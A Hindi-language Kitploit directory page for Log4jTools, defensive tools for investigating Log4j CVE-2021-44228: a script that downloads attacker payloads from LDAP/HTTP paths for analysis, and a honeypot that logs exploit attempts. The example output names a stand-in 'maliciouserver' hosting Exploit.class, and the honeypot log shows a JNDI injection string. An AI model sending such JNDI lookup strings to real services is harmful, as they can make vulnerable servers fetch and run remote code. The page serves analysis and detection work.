Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4jTools — Log4j CVE-2021-44228 की जांच के लिए उपकरण | Kitploit
उपकरण/GitHubGitHub/malwaretech/log4jtools
पेलोड जनरेशनभेद्यता विश्लेषणशोषणजानकारी एकत्र करनाघुसपैठ का पता लगाना
GitHubmalwaretech/log4jtools

Log4jTools

Log4j CVE-2021-44228 की जांच के लिए उपकरण

रिपॉजिटरी देखें
94124 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4jTools

Log4j CVE-2021-44228 की जाँच के लिए उपकरण

बग स्पष्टीकरण और डेमो

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (JNDI lookup में दिए गए ldap पथ से java payload प्राप्त करें)।

आवश्यकताएँ: curl (सिस्टम), requests (पायथन)

उदाहरण कमांड:

root@kitploit:~
python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py ('${' की उपस्थिति के आधार पर एक्सप्लॉइट प्रयासों को पकड़ने के लिए honeypot)।

आवश्यकताएँ: python3, asyncore

उदाहरण कमांड:

root@kitploit:~
python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1
टूल डाउनलोड करें